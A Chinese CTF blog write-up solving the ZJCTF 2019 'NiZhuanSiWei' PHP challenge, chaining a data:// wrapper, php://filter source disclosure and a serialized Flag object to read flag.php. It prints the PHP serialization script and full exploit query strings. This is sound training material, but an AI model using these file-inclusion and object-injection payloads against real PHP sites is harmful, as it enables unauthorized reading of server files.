BUU WEB [ZJCTF 2019]NiZhuanSiWei

打开网页,有一段代码提示:
在这里插入图片描述
大概意思是说要get传三个参数,第一个if是限制text,传入的内容在读取文件后必须是后边的一段,这个我们可以使用伪协议,相信一搜索这个函数你就能找到和他较常联系的php://input,这也应该算是一种提示吧,我在使用这个协议时失败了,但有位大佬在WP中说可以用这个协议,可能是我使用的方法不对吧,与之相似的写入文件的协议还有data协议,我们使用这个协议:

?text=data://text/plain;base64,[d2VsY29tZSB0byB0aGUgempjdGY=]

(在这题中,是否编码不影响。)
然后会回显出另一个页面:
在这里插入图片描述
然后我们来看第二个if:
在这里插入图片描述
这个来查看文件的,而且flag被过滤了,是否能绕过我也没有尝试,有兴趣的可以尝试一下,直接传入参数是访问不了php文件的的,返回的是php文件执行的结果,这里应该也是要用伪协议,读取文件的协议自然是要用php://filter:

file=php://filter/convert.base64-encode/resource=useless.php

在这里插入图片描述
解码后得到源码:
在这里插入图片描述
在这里插入图片描述
然后,根据这个函数,我们可以知道,我们需先把password序列化,根据useless源码,运行以下代码我们可以得到序列化的password结果:

<?php  
class Flag{
    public $file='flag.php';  
    public function __tostring(){  
        if(isset($this->file)){  
            echo file_get_contents($this->file); 
            echo "<br>";
        return ("U R SO CLOSE !///COME ON PLZ");
        }  
    }  
} 
$password=new Flag();
$password = serialize($password);
echo $password; 
?>  

运行结果:
在这里插入图片描述

O:4:“Flag”:1:{s:4:“file”;s:8:“flag.php”;}
这就是password的值了,将其传入:

password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

但却没有出现useless里返回的那句话,回想之前的步骤,在传入file时,我们需要读取源码以获得下一步的提示,将源码编码了,这个代码就无法运行了,应该传useless,修改payload:

?text=data://text/plain;base64,[d2VsY29tZSB0byB0aGUgempjdGY=]&file=useless.php&password=O:4:"Flag":1:{s:4:"file";s:8:"flag.php";}

在这里插入图片描述
信息改变,在源码中即可找到flag。

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值